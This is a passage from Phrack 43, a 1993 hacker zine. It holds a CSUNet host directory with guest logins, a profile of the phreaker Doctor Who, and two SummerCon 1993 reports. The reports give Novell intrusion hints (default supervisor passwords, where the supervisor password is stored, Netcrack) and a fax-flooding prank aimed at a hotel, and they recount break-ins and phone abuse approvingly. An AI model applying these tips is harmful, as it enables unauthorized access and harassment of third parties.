itself as the only host bak - Calstate/Bakersfield CDC Cyber Dual 830 CMR-1 (NOS 2.7.1) this system is running CDCNet, and if you fail the login, you can connect to these systems, if you type fast enough: CCS - Central Cyber 960 System CSBINA - CSUB Instructional Vax 3900 CSBOAA - CSUB Office Automation Vax 4300 CYBER - Local host RBFBATCH - CSUB CDC Cyber Remote Batch Gateway ccs - CDC Cyber 960-31 (CCS from Swirl) coc - CDC Cyber 960-31 (COC from Swirl) dh - Calstate/Dominguez Hills CDC Cyber 960-11 (NOS 2.7.1) - this system runs CDCNet with no hosts.. go figure fre - Calstate/Fresno - No info available ful - Calstate/Fullerton - No info available hay - Calstate/Hayward - No info available la - Calstate/Los Angeles - No info available lb - Calstate/Long Beach - No info available mv - No info available news - No info available nor - Calstate/Northridge - No info available pom - California State Polytechnic University, Pomona - No info available sac - Calstate/Sacramento CDC Cyber 180-830 (NOS 2.5.2) sf - Calstate/San Francisco - No info available sj - San Jose State University - No info available son - Sonoma State University CDC Cyber 180-830 (NOS 2.7.1) - this system runs CDCNet with itself as the only host sm - No info available slo - California State Polytechnic University, San Luis Obispo - No info available sta - Calstate/Stanislaus - No info available ven - No info available carl - No info available caps - CSUNet networking machine. From it, you can connecting to most PAD hosts plus a few more. The extras are: access - Connect to eis.calstate.edu (login as "access") core - Connect to eis.calstate.edu (login as "core") ctp - Connect to eis.calstate.edu (login as "ctp") eis - Connect to eis.calstate.edu (login as "eis") trie - Connect to eis.calstate.edu (login as "trie") csupernet - CSUPERNet appears to be a public-access UNIX. login as "public" for ATI-Net. login as "super" for academic information. login as "atls" for the ATLS system Once you apply for an account here, you can telnet to caticsuf.cati.csufresno.edu to use it. This is all well and good, but how to you access CSUNet? It can be reached via Internet, using the Humbolt PACX (pacx.humboldt.edu). The Humboldt PACX allows several services, among them are: X25 - Connect directly to CSUNet PAD 960 - CDC Cyber 180/830 (Swirl) 830 - CDC Cyber 180/830 (COC from Swirl) VAX - VAX 8700 (VMS V5.3) 70 - DEC PDP 11/70 (running RSTS) SEQ - Sequent S81 (running Dynix V3.1.4 X.25 UNIX software) TELNET - Telnet Server That's really all there is to say concerning the network structure (well, I could go through and list all their X.25 addresses, but I won't). There's a ton more to be said about using this network, but its little quirks and surprises can be left to you to figure out. What I can do here is give a few hints on using CDCNet and the PAD. Using the PAD ~~~~~~~~~~~~~ Once you're at the X.25 PAD, you'll get a message like: CSUnet Humboldt PCI/01, Port: P17 At the "Pad>" prompt, simply type the hostname to connect to. When in doubt, type "help ", or just "help" for a list of subjects that help is available on. Using CDCNet ~~~~~~~~~~~~ When a CDC Cyber says "You may now execute CDCNet Commands", this is your cue. You have the following commands available: activate_auto_recognition activate_x_personal_computer change_connection_attribute change_terminal_attribute change_working_connection create_connection delete_connection display_command_information display_command_list display_connection display_connection_attribute display_service display_terminal_attribute do help request_network_operator The ones to concern yourself with are display_service, create_connection, and help. "help" gives the above command listing (useful), "display_service" lists the hosts on the current CDCNet, and "create_connection " creates a connection to "host" on the CDCNet. *******************************************************************************  ==Phrack Magazine== Volume Four, Issue Forty-Three, File 6 of 27 -:[ Phrack Prophile ]:- This issue our prophile features a hacker who has been around forever, who's been there and done that, literally. His handle is Dr. Who. When almost everyone was still mystified by Telenet, Dr. Who was busily exploring Europe's PSN's like PSS and Datex-P. When the Internet was in its infancy, Dr. Who was there with an account on BBN. When the world was short of NUI's, Dr. Who discovered and perfected Pad-To-Pad. When the world still thought COSMOS was the end-all-be-all, Dr. Who was lurking on 1A's. One of the early LODers and one of the longest lasting. And to top it all off, a close personal friend. How elite can you get? ______________________________________________________________________________ Personal Info: Handle: Doctor Who (aka Skinny Puppy and Saint Cloud) Call him: Bob Date of Birth: February 5, 1967 Age: 26 Height: 6'1" Weight: 160 lbs Computers owned: in chronological order: Apple ][ series, Sinclair ZX81, Commodore TRS-80 models 4 and 16, Coco, Atari 512, Toshiba 2000sx. I am probably leaving out some. How did you get your handle? From the TV show, of course - I had a hard time defending it from other people, so would sometimes add (413), my home area code, to identify which one I was. Skinny Puppy was from the band of course, and Saint Cloud was from the location of a system I was playing with, in France. How did you get started? As a kid, I was a radio & electronics junkie. In 6th grade I wanted one of those $99 "computer kits" you would see in the back of "Popular Electronics" magazine, which had a hex keypad, and seven-segment LED display, had 1K of ram, etc...But lusted after the TRS-80 model-I when I used it at Radio Shack. I finally got a computer in 1981 when I was in 9th grade. I asked my parents for a Commodore, but they went all out and got an Apple ][+. I took to programming instantly, and within a few months had a reputation as the best programmer in my school. In a 1982 "Popular Communications" magazine article, I discovered the world of loops and test tones and started playing with those. I later tried to make free phone calls by using a tape recorder as a red box but failed, looking back probably due to inadequate volume. The seeds had been planted. I wanted all sorts of software, but I had no money, and my parents wouldn't buy very much. One computer-club meeting, someone brought in about 15 disks of pirated software, and I had a chance to copy about 4 disks. They guy told me about pirate BBSs, and people trading software. In a few of the games I copied, there were numbers to different BBSes, and when I was at a friends house on Cape Cod in the summer of 1983, we used his 300 baud acoustic modem to call them. I remember calling Pirate's Harbor in Boston, and I think we called Pirate-80. I wanted a modem badly, but they were too expensive. I convinced a friend to split the cost with me, and on January 2, 1984 my networker modem arrived. That month, in the process of getting warez I ran up over $150 in phone bills as there were no local boards. I was becoming obsessed with being on the modem, and on the computer in general. I was never a good student, and my parents and teachers found a way, they thought, to entice me to do my homework - hold computer usage over my head. But this just succeeded in making me sneak access when no one was looking - during lunch at school, or when my parents went shopping at home. Soon they locked the computer room (the den, really) when they left, but I used a ladder to get in to the second story window until I had a copy of the key. To this day I think if they let me indulge myself in my interest, I would have become a much more normal computer geek, and done better in school. Anyhow, I started learning about codez to appease the huge phone bills, and started to learn more about phones & how they worked. The pirating fell by the wayside as I became more involved with phreak/hack boards. I was fascinated by communications (I always had been) and phreaking/hacking opened up new frontiers. My inhibitions in breaking the law melted away because it interfered with my enjoyment of knowledge - had there been opportunities to pursue this avocation without breaking the law, I probably would have done so. A hacker was born. What are your interests? Women: Tall, thin, brainy, blue eyes. It seems as though I attract all the psychos. Right now, I am FREE of any relationships and haven't decided whether I am enjoying it or not. Cars: Cars are the greatest things. I love them. Art, Machine & House - The only possession I have that encloses me. I got my license later than most people, and have learned to enjoy the freedom wheels bring, especially for someone who lives in a rural area. Right now, I own two cars, one running (barely) and entirely generic, the other one very unique, beautiful, and broken. The story of my life! Food: I hate fish & chicken, love hot food. Not a vegetarian in the least. But don't eat much, I am too busy. I survive on Coffee. Music: I have been 'alternative' for a while now, kind of Gothic, sometimes I dress that way, sometimes I don't. Favorite bands: Joy Division, Skinny Puppy, old Cure, but I have been starting to like Techno more and also Classical. Go figure. Favorite authors: Ayn Rand, Ann Rice, Robert Anton Wilson, George Orwell, Douglas Adams, J.G. Ballard Favorite Book: Atlas Shrugged Favorite Movies: Brazil, 1984, The Holy Grail, Heathers, Blade Runner, Max Headroom, Slacker, Subway, Drowning by Numbers, Dune Favorite TV: Doctor Who (of course), The Avengers, Miami Vice, Hawaii Five-O What am I? A slacker, a hacker, a writer, a romantic, a twenty-nothing, a lost poet, a New Englander, an American in the truest sense of the word, a girl-chaser, a connoisseur of cheap champagne & expensive beer, a dilettante, a smoker of cloves, caffeine addict, an atheist, a discordian, a libertarian of sorts, a cynic, a procrastinator, a conversationalist, a fast driver, an oldest child, a criminal, a watcher of fire & water, a lover of love, a believer in the unpure, a trekkie, a whovian, an anglophile, still an undergraduate, jealous, mischievous, a perfectionist, a believer in the essential good in mankind, and probably a mortal. What are some of your most memorable experiences? The worst day of my life - 3/11/86 - getting busted, and not knowing what for. My parents called up my high-school and left a message for me to call home immediately. When I did, they informed me that the Secret Service and TRW (Hi Mr. Braum) had been in our house and removed everything. A nosy neighbor saw the whole incident, and within days our entire town knew about the raid. Some three and a half years later they pressed charges. So much for due process and right to a speedy trial. Good days: 5-91 - Being all fucked up in NYC with my girlfriend and Bill from RNOC; 10/9/84 - My first TAP meeting. Expecting to meet Mark Tabas but meeting his father instead. Tabas had run away from home, and his parents found some notes indicating that he might turn up in New York at Eddie's for the TAP meeting. Tabas' dad hopped on a plane to NYC, rented a car and staked out the meeting. Everyone inside, already convinced that they were under surveillance, became very aware that they were being watched by some guy in a suit and a rental car. Eventually, he came inside and asked if anyone knew where Tabas was. We said "Who wants to know?" To which he gave out his business card letting us know he was Tabas' dad and just worried. Tabas was not even in New York. The whole summer of 1985 - staying at home, hacking and loving being a computer geek. Four days straight on an Alliance Teleconference once, being woken up each morning by blasts of touch-tone! Philadelphia Cons, back in 86. West 57th St. - a few seconds towards my 15 minutes of fame. KP+914-042-1050+ST Discovering Pad-to-Pad. McD: Becoming an XRAY Technician. (Dr. Bubbnet) MSK ../tdas NET-LINE-20245614140000. Wallpapering my room with Sprint Foncard printouts Most of the rest of my most memorable experiences are in my love life, which is none of your business! Some People (and/or BBSes) To Mention: My favorite BBS of all time was Farmers of Doom. Also memorable were The Legion of Doom, Osuny, WOPR, Black Ice, and lots more. My favorite boards were the ones where there was a lot of activity, and a lot of trust between the users. While a board that doesn't crash all the time is important, an expensive computer does not a good board create. There are a lot of people who I would like to mention that have helped me greatly and who I have known for a very long time: Lex Luthor - Just because you're paranoid doesn't mean people AREN'T out get you. Mark Tabas - He really does look like Tom Petty. Bill from RNOC - Should sell used cars. RC Modeler - I hold you wholly responsible for the Clashmaster incident :) Tuc - Well, he's just Tuc. What else can you say? X-Man - Is he an FBI agent yet? Karl Marx - Only person I know with his own dictionary entry. Next: the social register. Mr. Bigchip - Who is that? (I'm sure you are all asking) The Videosmith - (see entry for Luthor, L.) Parmaster - Should have followed Lex's advice. Kerrang Kahn - His accent is finally gone. Terminal Man - So long and thanks for all the codes. (This man knew The Condor?) The Marauder - Has taken up permanent residence on IRC. Shatter, Pad, Gandalf - PSS Junkies. What those guys wouldn't do for an NUI. New York - Don't Mess With Texas Everyone Else - Sorry I couldn't think of anything clever to say. One I would like single out is Erik Bloodaxe, who I have known over the phone for 9 years now, but will meet for the first time at this year's Summercon, if I get there. [Ed: He didn't make it] Also: for you hackers that have disappeared from my life, you who had my number, my parents' number has never changed, you can contact me through them if you like, I would love to hear from you. How do you see the future of the Underground? It's not going to go away. There will always be new challenges. There are always new toys for curious minds. There may be a split into several different, only partially interlocking 'undergrounds' involving different types of technological playing. In spite of Caller-ID and advanced security functions of the new digital switches, there will still be many ways to phreak around the phone system: taking advantage of the old Crossbars in remote areas, and by finding some of the 'pheatures' in new switches. Hacking on the Internet will always be around despite who controls the net, though I am sure there would be a lot more destructive hacking if the mega-corporations take it over. Security of systems is more a social problem than a technological one, there is always a segment of the population that is gullible, stupid, or corrupt. There will always be some smartass out there making trouble for the Organization. Constantly evolving systems and brand new systems will present security holes forever, though they may be harder to understand as the systems grow more complex. With more computers networked there will be a lot more to play with. Socially, I am worried about the huge wars that have developed, LOD v. MOD, etc. While hackers have always been contentious, as well they should be, the ferocity of attacks has me somewhat stunned. I will leave out blames and suggestions here, but I will just make the observation that as any community grows large in size, the intimacy that it enjoys will be diminished. When the underground was small, isolated, and revered as black magicians by outsiders, it was as though we were all part of some guild. Now that there are many more people who have knowledge of, and access to, the hacker community, there is little cohesiveness. I see this getting worse. The solution may be tighter knit groups. But an outbreak of wars between mega-gangs could be a real catastrophe. The cyberpunk aesthetic seems to have captivated the underground. Some people have to be aware that the community was here before William Gibson was patron saint, and that most of us still can't successfully "rustle credit" - which means this is a hobby, not a profession. Will this change? Slowly, I imagine. The trendies will get tired and find something else to pretend to be, (maybe dinosaurs, given the current popularity of Jurassic Park), and only the hard-core hackers will be left. Some of us may, in time, turn into computer criminals, to which I am indifferent, as it won't be me. The current cyber-hysteria has attracted a whole bunch of trendy fakes, and is distracting us from what originally brought us, most of us anyway, to hacking/phreaking in the first place - the insatiable curiosity, the dance of the mind unbounded. Will the hype die? Time will tell. Sometimes I get so sick of the crap I see on IRC that I wish someone would give me back an apple IIe and an applecat 212, and set me back down in 1984. Just call me over the hill. Any end comments? Hacking is the art of esoteric quests, of priceless and worthless secrets. Odd bits of raw data from smashed machinery of intelligence and slavery reassembled in a mosaic both hilarious in its absurdity and frightening in its power. -----------=?> Doctor Who Stuart Hauser from SRI, Stanford Research Inst. was the first speaker of the day, he was (or is) a older looking man who looked relaxed and confident. He was here to tell us about SRI and their goals (or he was here to milk the crowd for info, depends who you talk to I suppose). SRI is an international corporation, employing over 3000 people, that claims no ties to the Feds, NSA , CIA or any other government arm interested in harming, persecuting or even prosecuting the hacker community. Their main concern is major network security, on a corporate level. However there was talk of SRI having contract work for military related arms producers this was not brought up at the conference. He started by talking about himself and SRI, he mentioned their policy and their feelings towards dealing with the hacker community on a productive level. He went on to confirm, that someone we all know or know of that works for the same company is an asshole, and we are not the only community to realize this. I will leave his name out for reasons of privacy, however a good hint for those who were not at scon and are reading this his first name starts with DON. After allowing us all to laugh this over he went to tell us of the finding of his teams research form SRI. His team consisted of himself, Doug Web, and Mudhead, they were tasked to compile a report on the computer underground in some nebulous fashion, he was of course (at least to me and everyone I was sitting with) not very clear with this. To the best of our knowledge the report was like a damage potential report, ie: How much can the hackers really do, and HOW much will the hackers do? Stu conceded that the networks and companies had more to fear from corporate espionage at the hands of employees and mismanagement then they did from hackers. However he fears a new breed of hackers he says are becoming a reality on the nets, the hacker for cash, digital criminals. He felt that this new breed of hacker will be counterproductive for the both the PD world and the underground on the basis that if they destroy it for the corps, we cannot use it either. In the way of security Stuart felt the Social engineering was the biggest weakness of any system, and the most difficult to defend against. Also he felt too much info about machines and security of them was public info, also public info was available for use in social engineering. He felt that the only way to combat this is to make the employees and owners of companies more aware of these threats. Beyond the social engineering he feels that physical measure are too weak at most facilities and do not protect there hardcopy data well enough he meant this both for Trashing and actual b&e situations again he felt the situation was to spread awareness. While conducting the interviews to for this report Stuart formed his own opinion of the hacker which he shared with us. He feels that hackers for the most part are not malicious at all, and are actually decent members of cyberspace. Moreover he feels that hackers should be put to work as opposed to put to jail. Something we all feel strongly about. Stuart finished his speech with brief allusions to scholarships and upcoming programs, at this point he left the floor open to questions. The are as follows: Emmanuel Goldstien: "Earlier you (Stuart) mentioned the existence of 'malicious hackers', where are they?" Stu: "Holland, Scandinavia, the UK poses a great threat, Israel, Australia. The bloc countries for virii and piracy are very busy right now, We have to wonder what will happen when they get full access to our nets. What happens when the eastern bloc catches up?" Unknown: "Who finances this". Stuart: "Really that's none of your business" (paraphrased ) Unknown: "Where is the evidence of these so called malicious hackers, I think the whole malicious hacker idea is spawned by the media to justify the persecution of hackers". Stuart: [Has no chance to reply] Control-C: (interjects) "Punk kids are all over the place doing it man." KL: "its common knowledge that it is happening there." Stu: (offers example) Was told that at three companies have tried to hire tiger teams, for corporate breaches however he has no proof of this. Yet he feels the sources were reliable. Unknown: "I have heard rumors that SRI is writing software to catch hackers. is this true?" Stu: Says he hasn't heard about this. However if they are more interested in what SRI is doing he will be sticking around until this afternoon or evening. And has about 15 copies of the report that are available to the public. Next speaker [I was out of the room for this speaker and asked Black Kat to type this in, so your guess is as good as mine.] Someone showed a DES encryption laptop, 8 months old, with a built in chip to encrypt everything in and out (modem, disk, etc). Didn't have an overhead projector but was giving personal demos. Made by BCC (Beaver Computing Company) out of California. Doesn't advertise, but will give sales brochures etc, if you call the 800 number. Thinks the govt is discouraging wide scale distribution. Count Zero & RDT Count Zero announced he would be talking on a unique telco feature they found and about packet radio. Stickers and board adds from RDT and cDc were handed out at this time. White Knight and Count0 started by introducing a bizarre telco feature they came across, and played a tape recording to demonstrate some of its features to the crowd. After some chatter with the rest of the con, nothing definite was concluded, however, some good ideas are brought out. (As well as some insight by folks who have discovered similar systems.) Next came some comic relief from Count0 and White Knight in the way of the termination papers of an employee from a telco, the employees case report was read to the crowd and essentially painted the picture of a really disgruntled and ornery operator. Specifics were read, and people laughed at the shit this guy had gotten away with, end of story. Following this Count0 spoke for Brian Oblivion who could not be there about an American Database/social program called America 2000. Brian came across this information by the way of a group in Penn state, the program is meant to monitor the attitudes of students, and how they behave with within state standards.. Furthermore the Database is compiled without the knowledge or permission of parents, beyond this the file can stay with a man or woman for life, in the hands of the state. Count0 on Packet Radio Self-empowering Technology Next came the actual Packet radio discussion, Count0 displayed his hardware and talked at great length on a whole spectrum of issues related to the radio packet switching, and some points while straying, even the morality of the FCC. This went on for quite some time. Count0 instructed the crowd on the principle behind packet switch radio as well as explaining which licenses to get and to apply. Drunkfux, Merchandising Drunkfux Drunkfux started by, Merchandising a shitload of ho-ho con shirts, 15$ a piece as well as mthreat his tonloc shirts, also selling the mods for the Mistubishi 800, mthreat also had a chip preprogrammed for the Mits 800 avail. Those who could not get the mod were told to get it from cypher.com in /pub/vind. He told us of the new Metal Land revival and said a bit about it. Next and most interesting was the discussion of the fate of Louis Cypher, and his companions in the recent bust. It seems Cypher and ALLEGED accomplices Doc and JP have been charged with numerous felonies not which the least of is Treasury Fraud and b&e of a federal post office. Drunkfux went into detail on how they had been turned on, and essentially entraped into the situation. Also how the media as per usual had made a witch hunt out of it by connecting Doc to the a remote relation to the Kennedys etc, etc. Eric Neilson with CPSR Eric Nielson started by telling the crowd what had drawn him to the CPSR, by the way of reading a discussion in congress about a congressman defending the strength of a Starwars network by stating that the gov had an excellent example for security: the phone networks in the USA. Needless to say Eric had little faith in this analogy . He went on to describe what the CPSR covers and what they have done recently in the of the clipper debate, Sundevil and other 1st Amend. issues. He discussed the internal workings of CPSR and its funding police as well as telling Conf Members how to go about joining. Erik Bloodaxe Erik started out with explaining why Phrack 43 is not yet out. This is due to the fact that Stormking.com will not allow it to be mailed from it, seeing as the owner does telco consulting and feels it would be a conflict of interest. Furthermore he won't give the listserve to the Phrack Staff, making it somewhat difficult to distribute. However KL is acting as a mediator and hopefully this will be settled soon. Mindvox was considered but rejected as a choice, for fear of people getting a hold of the list.. On the issue of Phrack and the copyright, Erik had only ONE fed register out of all those who collect it. However Phrack has obtained logs of both CERT forwarding Phrack by mail, as well as Tymnet obtaining the mag. Beyond this Agent Steel was discussed in an "I told you so fashion" it turns out that him being accused of being a narc in the past were valid, seeing it was proved by way of documentation that Agent ratted out Kevin Poulsen (Dark Dante) resulting in his current 19 charges. And of Course the new LOD issue was broached, however very little was discussed on it and it was simply agreed to a large degree that Cameron (lord Havoc) must have been seriously abused as a child to display the type of obvious brain damage he is afflicted with now. Emmanuel Goldstein 2600 Emmanuel Goldstein in his purple Bellcore shirt discussed with us his appearance before a Congressional hearing on a panel with Don Delaney and how the hostility shown towards him by the house representatives in session. Beyond this he went on to describe several nasty letter letters sent to him by telcos for PUBLIC info he had posted in the winter issue of 2600. This is a very brief summary of what he had to say, mainly due to the fact that I was too busy listening to him to concentrate my apologies go to those who were interested in reading the whole thing. Next up was a lengthy discussion on Novel Software and its weaknesses, By Erreth Akbe however the speaker he wished me to leave this out of the transcripts so I will respect his wishes in this. ********End Of Transcript*********** I would like to thank the following for making the Con an experience for me that I will not soon forget: Arist0tle, Black Kat, Butler, Control-C, Erreth Akbe, Tommydcat, the Public and theNot. Thx guys. Please send all responses to Besaville@acdm.sait.ab.ca ***************************************************************************** Presenting ::: SummerCon 1993 in Review !!! Hacking Tales and Exploits by the SotMESC Additional Activities by the GCMS MechWarriors -()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()- The weather was right, too right. Something was foul in the air. It was akin to that mythical 'Calm before the Storm' scenario that is dreaded by so many. But, Scribbles and I boarded the Techno-Laden SotMESC compact and took off down the Highway to our ultimate goal . . . Hacker Heaven in Summertime Fun - SummerCon !!! Instantly, weather was seen brewing in the Caribbean. Hints of Hurricanes echoed through the towns we drifted through. To alleviate any anxieties, massive quantities of Jolt! were obtained in the infamous town of Hatties-Gulch, a small town taken over by the virulent filth called College Students. The trip continued, over hill and over dale. Dale was quite considerate not to press charges. Colleges were passed in a blink of the eye. Nothing was going to stop us. We were on a mission from the Church. But, that's another story. After locating that famous arch, a beeline was made at speeds over 100 MPH through St. Louis until our destination came into view: The St. Louis Executive International (800-325-4850). We came to meet our nemesis and friends at the fest hosted by the Missouri Programming Institute. Brakes were quickly applied as the car appeared to be going off the off-ramp and into the ditch. From the lobby it was obvious, there were unusual people here. These were the kind of people that you fear your daughters would never meet. The kind of people that kicked themselves into caffeine frenzies and would become infatuated with virtual lands. Yes, these were my kind of people. Now, the adventure may start . . . Oh, and in response to A-Gal on pg 30 of 2600, Scribbles says she's the sexiest hacker on the nets. Hmmmmm, I'm inclined to agree with that. I'm sure Control-C will agree too, especially after he trailed her for half of SCon. Now, we all know that Friday is the warm-up day on what we can expect to see at SCon during the main Saturday drag. It was no surprise to find the main junction box rewired, pay-phones providing free services, rooms rerouted and computers running rampant down the hallways. But, the traditional trashing of Control-C's room this early signaled that more would be needed to top the night. The maid was definitely not pleased. For a list of those that attended, maybe KL can provide us with that information. There were too many faces for my fingers to lap into. And, there were quite a few new faces. I believe that Weevil was the youngest hacker at 16, and Emmanuel was the oldest, although he didn't give his age. -()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()- THE CONFERENCE -()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()- Let's get to the meat of the matter. The conference had a nice spacious central area with tables neatly lining alongside the wall. Between the tables and the walls were many hacks packed as tightly as they could get. Why didn't we think of moving the tables closer together ??? KL took control and ran the conference smoothly. dFx panned everyone on his digital camcorder. Several cameras were around to provide us with gifs later. And the conference took off . . . First up was Stuart from SRI (Stanford Research Institute). He elaborated on SRI's being involved in research, engineering and design. From studies done around the world with hackers and those associated, malicious hacking can not be stopped. There is no evidence, though, that the current hackers are interested in bringing the networks down at all. Concern was given to new hackers that may be emerging with financial gain and maliciousness occurring. The top security hole with system was noted as being the infamous social engineering technique. SRI did note that many places did not utilize the security that they even had in place. It was also noted that laws against malicious hackers, and probably any hacker, should be fair and just. The most malicious hacks that are turning up have been spotted in the following named countries: Holland, Scandinavia countries, very possibly soon in the UK, Australia, Israel, the former USSR, and Bulgaria ( noted for virii writers ). A voice made mention of Operation Rahab, hackers in German Intelligence. Next up was Count Zero from cDc/RDT to talk about packet radio. His talk included information about the IESS and handed out a flyer on America 2000 ( school under 1984 regimes ). Maybe someone will provide us with a copy of this. A packet radio modem at 1200 can be obtained easily for $50. TCP/IP packets are already being send over the bandwidth along with other network protocols. The usefulness of all this is that the information is broadcast and it is virgin territory. The baud limitation is due only based upon the bandwidth you are operating at and the number of collisions occurring. On a band you can see every packet that is being transmitted if you wish. All this is located on a 2 meter band. Currently the FCC forbids encryptions on the airwaves, although this is noted as being virtually impossible to enforce. It also takes 5 months to get an amateur radio license, and your personal info is recorded in a book easily obtained at libraries. The problem with going around the FCC is that there exist vigilante HAMs that monitor the bands and have nothing better to do than filter info and whine to the FCC. Bandwidths are decreasing though. This is due to an increased interest overall by communications in these areas. Unless you do something major the FCC will not give you much interest. The book on preparing yourself for a Tech Class can be obtained from Radio Shack for $9. Next up was dFx. He was promoting the HCon and Tone-Loc t-shirts that were for sale. Merchandising was getting pretty high. He also gave out a few Mitsubishi 800 disks. He was also recognized as the ONLY and LAST member of the Neon Knights, a club that had a wide range of comedy names generated. The word was put out the HCon '93 will be in December 17-19 with a hint that it could also wind up being in Austin. Then the conversation turned to Lord Byron's bust, which we should here more information on any day this week. The conversation reiterated the government narc that was at the AA meeting that was pressuring Byron. Byron was also noted as having rejected a plea bargain the courts offered him. And lastly, it is going to happen soon so get them while you can. The FTP site at eff.org will be dropping its CuD directory due to a conflict of interest with EFFs major contributors, mainly the RBOCs and other interest groups that don't like us. Erik Bloodaxe took the table next to talk about what was happening with his involvement with Phrack and some interesting info about Agent Steel. As for Phrack, the Email list is being with-held by Tuc. The mailing list has been refused at Mindvox due to files missing mysteriously at that site. And, no organization registered for Phrack #42 since it was copyrighted with a nice and lengthy preamble, except for one company from Mitre. Currently Phrack #43 is in limbo and is estimated at 1 Meg long. Going onto the info about Agent Steel, basically he's a narc. Lord Havok from Canada is trying to restart the LOD under some unknown logical rationale that since LOD is defunct, anyone can reclaim the name. Lord Havoc, aka Cameron, has been going around trying to get documentation to put together an LOD technical journal #5. Supposedly there is a skin-head group in Canada that in now tracking Cameron down. Someone came up next [Minor Threat] and gave us an update on Codec. Two weeks after the last SCon, Codec was pulled over while on the run from the law for speeding and then arrested for burglary, resisting arrest, etc . . . He is estimated to be out of jail in 1995 and still has time to serve in a few other states. Mail can be sent to him at this address: codec@cypher.com. Maybe Crunch can give Codec some hints on how to get by in prison? From the CPSR, Eric Nielson took the table. He elaborated on the CPSR and ran a Q&A period. Basically, the CPSR files many FOIA requests and sues the government. Their focus is on the workplace computing. Elaboration was given on the Clipper Chip and computer ship security. The CPSR is staffed with lawyers and takes their funding from dues and grants. They are not sponsored by any corporations. From the far side of the table came the infamous Emmanuel Goldstein from 2600. He stated how he had testified at congress and gave them a live demonstration of bandwidth scanning and redboxing. While he was there, the inquisition started against him on the issue of 2600. Emmanuel then tried to explain the culture to our representative that it is bad to classify all hackers as criminals. Goldstein then went on to talk about the DC 2600 bust and how it has resulted in 2600 meetings springing up all across the country. A review of several films on software piracy at the office, disaster recovery and viruses from Commonwealth Films was given. And, to highlight everything, 2600 has purchased an AT&T van that they plan to take to assorted conventions and start a fleet of these up. Pst, BTW, on pg 43 of 2600 the intersection should be a jump =:) Last up was Erreth Akby, a Certified Netware Engineer. He explained that the only upgrade in Novell 4.0 is the disk compression. He also informed us that the supervisor and guest accounts generally have default passwords. TO hack into this Net, you should use a PC with full alt and functions keys. The supervisor p/w is on the RConsole in a file called autoexec.mcf on version 3.11. Netcrack will not work on a system with Intruder Lock-Out. Non-dedicated netware must boot from a floppy. Best of all, you can dial out by using cubix-quarts, which are PC with modems on the system. Below is a quick reprint of a paper that was recovered from Control-C's trashed room. Mrs Jasnagan, I would like to set up a meeting to discuss Kevin's progress in Social Studies and English. Please let me know when it would be convenient. Thank you ( Scribble , scribble ) Dear Mr + Mrs Gormby, We would be happy to meet with you at 9:30 on Thursday, April 1st in Room 104 Sincerely, M.Jarnagin & S.Dietrich Now, could this be Kevin Poulson ??? Naaa, no way. Amazing what technical data trashing will uncover. I guess I should throw this away now . . . After the convention, there was much rejoicing. The reasons would become fairly obvious as a 'swingers party' sign was soon located outside one of the hotel wings. Yes, it would be a very good convention. Several people made their way to the vehicles for a long night of trashing and raiding of the various FedEx, UPS and other assorted boxes around town. Other groups made their way to computers that were trying to connect with anything they could out in town. There were also those that reluctantly went to the mall to take advantage of the local population. What did not happen ??? Control-C did not get laid, but it was rumored that there were a few 12-year olds wandering around the hotel looking for this legendary hacker. No deaths had occured, the fires were kept to a minimum and nothing major was noted as being broken. One thing was for sure, there were a lot of alcoholic beverages going around, walkie-talkies, scanners, and wild tales. Several area buildings were broken into, but nothing major was done. Then the shit hit the fan. It seems several hackers had riled the swingers into a frenzy. I guess the swingers couldn't swing with it. What happened ??? Phones went ringing room to room and radios blared to life that the cops were here !!! At count, there were 6 cops, 1 sheriff and 4 hotel employees that started patrolling the hallways. Yes, we were under room arrest at our own convention in our own wing. Anyone that left there room was told to stay there or they would be arrested. The cops were very insistent that no pictures were to be taken. The swingers had broken our balls. But, this would not stop us. Soon, there was a phone network going on with radio interfaces. The windows opened and a few migrated to other locations of the hotel. After a while, the authorities left feeling satisfied that they had intimidated us. They didn't. After they left, the hallways erupted again. In the SotMESC room a gathering turned out to watch several techno-infested videos. At the cDc room were others viewing the HoHoCon '92 film that dFx brought down with him. At one point, the microwave around the lobby was detonated and a mysterious stack of Credit Card carbons was found. The liberated phones were being utilized to their full international extent, and several of the soda machines decided to give out a few free drinks. But, we couldn't leave well enough alone. Sir Lance went to the lobby and took a picture of the hotel Asst. Manager. I guess this guy didn't like his photo being taken, since he turned around and called the cops on Sir Lance. Down the hallway the cops came, dragging Sir Lance back with them. In the end, the cops explained to the Asst. Manager that it was not a crime in the US to take pictures of people. In another related story, Kaos Wizard wound up calling the SotMESC room with a wild plea for help. It seemed he was with a large group of trashers that included Albatross, Intrepid, Forced Entry, Zippy, The Public and more. Kaos was at a Central Office close to the hotel on Woodson and needed help. He had taken off to take a piss and noticed that the trashers were surrounded by cops when he returned. There was no way he was going back with all those cops there ( and, might I mention, there was also a police dog ). Mystic Moos gathered up a few people and went to rescue Kaos Wizard as the rest of the trashers returned to the hotel. It seems they had eluded the cops by telling them that they were waiting for their friend to return from taking a bathroom break ( Kaos Wizard ). Unfortunately, he never returned. The cops let them go eventually. Mystic Moos rescued Kaos Wizard, and the hotel was aglow in activity again. Control-C came down the hall at one point to make a startling discovery. It seems that at a local club there was a band playing that featured 'Lex Luthor'. The elusive X-LOD founder had been located. AFter some thought, it was decided he could stay there and sing the blues while the rest of us partied the night away. For those interested, the hotel fax is 314-731-3752. One of the police officers detaining us was S.M. Gibbons. IBM will send a 36 page fax to the number you give them. To activate, call 1-800-IBM-4FAX. As you can imagine, it wasn't long before the hotels fax ran out of thermal paper. Below is a gathering of Flyers . . . HoHoCon '92 Product Ordering Information If you are interested in obtaining either HoHoCon shirts or videos, please contact us at any of the following: drunkfux@cypher.com hohocon@cypher.com cDc@cypher.com dfx@nuchat.sccsu.com 359@7354 (WWIV Net) HoHoCon 1310 Tulane, Box #2 Houston, Tx 77008-4106 713-468-5802 (data) The shirts are $15 plus $3 shipping ($4 for two shirts). At this time, they only come in extra large. We may add additional sizes if there is a demand for them. The front of the shirt has the following in a white strip across the chest: I LOVE FEDS ( Where LOVE = a red heart, very similar to the I LOVE NY logo ) And this on the back: dFx & cDc Present HoHoCon '92 December 18-20 Allen Park Inn Houston, Texas There is another version of the shirt available with the following: I LOVE WAREZ The video includes footage from all three days, is six hours long and costs $18 plus $3 shipping ($4 if purchasing another item also). Please note that if you are purchasing multiple items, you only need to pay one shipping charge of $4, not a charge for each item. If you wish to send an order in now, make all checks or money orders payable to 